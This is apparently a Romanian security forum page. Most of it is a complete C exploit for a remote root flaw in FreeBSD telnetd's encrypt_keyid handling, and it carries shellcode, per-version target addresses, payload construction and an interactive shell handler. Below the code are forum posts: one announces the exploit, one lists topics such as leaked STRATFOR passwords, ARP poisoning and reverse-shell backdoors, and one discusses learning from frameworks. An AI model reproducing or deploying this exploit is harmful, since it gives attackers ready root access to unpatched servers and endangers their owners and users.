Telnetd encrypt_keyid: Remote Root function pointer overwrite /*************************************************************************** * telnetd-encrypt_keyid.c * * Mon Dec 26 20:37:05 CET 2011 * Copyright 2011 Jaime Penalba Estebanez (NighterMan) * * nighterman@painsec.com - jpenalbae@gmail.com * Credits to batchdrake as always * * ______ __ ________ * / __ / /_/ / _____/ * / /_/ /______________\ \_____________ * / ___ / __ / / __ / \ \/ _ \/ __/ * / / / /_/ / / / / /___/ / __/ /__ * ____/__/____\__,_/_/_/ /_/______/\___/\____/____ * * ****************************************************************************/ /* * * Usage: * * $ gcc exploit.c -o exploit * * $ ./exploit 127.0.0.1 23 1 * [<] Succes reading intial server request 3 bytes * [>] Telnet initial encryption mode and IV sent * [<] Server response: 8 bytes read * [>] First payload to overwrite function pointer sent * [<] Server response: 6 bytes read * [>] Second payload to triger the function pointer * [*] got shell? * uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) * */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <errno.h> #include <sys/time.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #define MAXKEYLEN 64-1 struct key_info { unsigned char keyid[MAXKEYLEN]; unsigned char keylen[4]; unsigned char dir[4]; unsigned char modep[4]; unsigned char getcrypt[4]; }; static unsigned char shellcode[] = "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\xb0\x17" // mov $0x17,%al "\x50" // push %eax "\xcd\x80" // int $0x80 "\x50" // push %eax "\x68\x6e\x2f\x73\x68" // push $0x68732f6e "\x68\x2f\x2f\x62\x69" // push $0x69622f2f "\x89\xe3" // mov %esp,%ebx "\x50" // push %eax "\x54" // push %esp "\x53" // push %ebx "\x50" // push %eax "\xb0\x3b" // mov $0x3b,%al "\xcd\x80"; // int $0x80 static unsigned char tnet_init_enc[] = "\xff\xfa\x26\x00\x01\x01\x12\x13" "\x14\x15\x16\x17\x18\x19\xff\xf0"; static unsigned char tnet_option_enc_keyid[] = "\xff\xfa\x26\x07"; static unsigned char tnet_end_suboption[] = "\xff\xf0"; /* * shell(): semi-interactive shell hack */ static void shell(int fd) { fd_set fds; char tmp[128]; int n; /* check uid */ write(fd, "id\n", 3); /* semi-interactive shell */ for ( { FD_ZERO(&fds); FD_SET(fd, &fds); FD_SET(0, &fds); if (select(FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) { perror("select"); break; } /* read from fd and write to stdout */ if (FD_ISSET(fd, &fds)) { if ((n = read(fd, tmp, sizeof(tmp))) < 0) { fprintf(stderr, "Goodbye...\n"); break; } if (write(1, tmp, n) < 0) { perror("write"); break; } } /* read from stdin and write to fd */ if (FD_ISSET(0, &fds)) { if ((n = read(0, tmp, sizeof(tmp))) < 0) { perror("read"); break; } if (write(fd, tmp, n) < 0) { perror("write"); break; } } } close(fd); exit(1); } static int open_connection(in_addr_t dip, int dport) { int pconn; struct sockaddr_in cdata; struct timeval timeout; /* timeout.tv_sec = _opts.timeout; */ timeout.tv_sec = 8; timeout.tv_usec = 0; /* Set socket options and create it */ cdata.sin_addr.s_addr = dip; cdata.sin_port = htons(dport); cdata.sin_family = AF_INET; pconn = socket(AF_INET, SOCK_STREAM, 0); if( pconn < 0 ) { printf("Socket error: %i\n", pconn); printf("Err message: %s\n", strerror(errno)); exit(-1); } /* Set socket timeout */ if ( setsockopt(pconn, SOL_SOCKET, SO_RCVTIMEO, (void *)&timeout, sizeof(struct timeval)) != 0) { perror("setsockopt SO_RCVTIMEO: "); exit(1); } /* Set socket options */ if ( setsockopt(pconn, SOL_SOCKET, SO_SNDTIMEO, (void *)&timeout, sizeof(struct timeval)) != 0) { perror("setsockopt SO_SNDTIMEO: "); exit(1); } /* Make connection */ if (connect(pconn,(struct sockaddr *) &cdata, sizeof(cdata)) != 0) { close(pconn); return -1; } return pconn; } static void usage(char *arg) { printf("Telnetd encrypt_keyid exploit for FreeBSD\n"); printf("NighterMan <nighterman@painsec.com>\n\n"); printf("Usage: %s [ip] [port] [target]\n", arg); printf("Available Targets:\n"); printf(" - 1: FreeBSD 8.0 & 8.1\n"); printf(" - 2: FreeBSD 8.2\n\n"); } int main(int argc, char *argv[]) { /* Payload Size */ int psize = (sizeof(struct key_info) + sizeof(tnet_option_enc_keyid) + sizeof(tnet_end_suboption)); struct key_info bad_struct; unsigned char payload[psize]; unsigned char readbuf[256]; int ret; int conn; int offset = 0; if ( argc != 4) { usage(argv[0]); return -1; } /* Fill the structure */ memset(&bad_struct, 0x90, sizeof(struct key_info)); memcpy(&bad_struct.keyid[20], shellcode, sizeof(shellcode)); memcpy(bad_struct.keylen, "DEAD", 4); memcpy(bad_struct.dir, "BEEF", 4); memcpy(bad_struct.modep, "\x6c\x6f\x05\x08", 4); /* Readable address */ /* Shellcode address (function pointer overwrite) */ switch (atoi(argv[3])) { case 1: memcpy(bad_struct.getcrypt, "\xa6\xee\x05\x08", 4); break; case 2: memcpy(bad_struct.getcrypt, "\xed\xee\x05\x08", 4); break; default: printf("Bad target\n"); return -1; break; } /* Prepare the payload with the overflow */ memcpy(payload, tnet_option_enc_keyid, sizeof(tnet_option_enc_keyid)); offset += sizeof(tnet_option_enc_keyid); memcpy(&payload[offset], &bad_struct, sizeof(bad_struct)); offset += sizeof(bad_struct); memcpy(&payload[offset], tnet_end_suboption, sizeof(tnet_end_suboption)); /* Open the connection */ conn = open_connection(inet_addr(argv[1]), atoi(argv[2])); if (conn == -1) { printf("Error connecting: %i\n", errno); return -1; } /* Read initial server request */ ret = read(conn, readbuf, 256); printf("[<] Succes reading intial server request %i bytes\n", ret); /* Send encryption and IV */ ret = write(conn, tnet_init_enc, sizeof(tnet_init_enc)); if (ret != sizeof(tnet_init_enc)) { printf("Error sending init encryption: %i\n", ret); return -1; } printf("[>] Telnet initial encryption mode and IV sent\n"); /* Read response */ ret = read(conn, readbuf, 256); printf("[<] Server response: %i bytes read\n", ret); /* Send the first payload with the overflow */ ret = write(conn, payload, psize); if (ret != psize) { printf("Error sending payload first time\n"); return -1; } printf("[>] First payload to overwrite function pointer sent\n"); /* Read Response */ ret = read(conn, readbuf, 256); printf("[<] Server response: %i bytes read\n", ret); /* Send the payload again to tigger the function overwrite */ ret = write(conn, payload, psize); if (ret != psize) { printf("Error sending payload second time\n"); return -1; } printf("[>] Second payload to triger the function pointer\n"); /* Start the semi interactive shell */ printf(" [*] got shell?\n"); shell(conn); return 0; } Citeam inainte de Craciun despre aceasta problema, se pare ca a aparut un exploit pentru telnetd. Sursa: Telnetd encrypt_keyid: Remote Root function pointer overwrite More info: http://thexploit.com/secdev/a-textbook-buffer-overflow-a-look-at-the-freebsd-telnetd-code/

Parolele nu sunt de la mail-uri ci de la site-ul de unde au fost "preluate". Totusi exista sanse ca unele persoane sa foloseasca aceeasi parola in mai multe locuri.

Partea cu "furatul" din framework-uri nu e legata tocmai de furat, ci mai mult de invatat. Acele framework-uri de obicei sunt scrise pe persoane cu multi ani de experienta in domeniu, si de multe ori sunt surse bune de documentatie, surse din care poti invata multe: - optimizari de cod - aranjare si documentare cod - scriere profesionala de cod

Ultimele update-uri: [h=6]Open Penetration Testing Bookmarks Collection Vulnerability Database Pentagon approved Android to be used by DoD officials STRATFOR leaked accounts (10257 passwords recovered) Lynis Auditing Tool 1.3.0 Ubertooth ARP Cache Poisoning Monkey || ARP Poisoning tool Network Destroyer ARP TCP Flooder [Rezolvare] SQL Injection Control Remote System [SQLi] Intel MySQL 5.5.8 Remote Denial Of Service (DOS) Lighttpd 1.4.30 / 1.5 Denial Of Service[/h] [h=6]The Perfect Server - CentOS 6.1 x86_64 With nginx Execute Binary In The Alternate Data Stream [Unix] Install Freebsd 8 in 8 minutes False SQL Injection and Advanced Blind SQL Injection Simple Virtual Machine Untethered jailbreak demonstrated for iOS 5, iOS 5.1 Kaspersky Anti-Virus and Internet Security 2012 Vulnerable to Hackers China Software Developer Network (CSDN) 6 Million user data Leaked The Crypter Blueprint[/h] [h=6]Oracle Solaris 11 Kernel Source Leaked HTML5 web security Metasploit on Amazon Kindle Securitytube Metasploit Framework Expert ( Armitage ) Probably the Best Free Security List in the World A simple HTML tag will crash 64-bit Windows 7 Excel formula injection in Google Docs CSS - The sexy assasin Backdoor in Android for No-Permissions Reverse Shell[/h] Daca sunteti interesati de topicurile utile de pe forum: Like: Romanian Security Team | Facebook http://www.facebook.com/rstforum

Depinde ce vrei sa spui prin asta. Daca vrei sa inveti programare doar la un nivel de baza, apoi te apuci sa studiezi framework-uri DA, nu e tocmai ok, in sensul ca nu o sa intelegi ce fac mai exact acele framework-uri, cum functioneaza. Daca in schinb inveti bine programare, si observi cu ochii tai ca poti face tu ceea ce face un framework o sa privesti altfel situatie, o sa incepi sa iei in considerare optimizarile si anume ca de fapt nu ai nevoie de tot acel framework si ca daca implementezi tu o parte din framework o poti implementa mai optim pentru proiectul tau. Apoi, din moment ce ai stii sa faci ceea ce face acel framework, nu va fi nicio problema sa studiezi codul acelui framework, sa iei cateva idei, sau chiar bucati de cod, pentru ca le-ai intelege. Daca din start, cu o linie de cod, faci ceea ce ar face 1000 de linii de cod, habar nu ai ce se intampla de fapt si nu ai nici accesul de care ai avea nevoie, in caz ca treci direct pe framework-uri.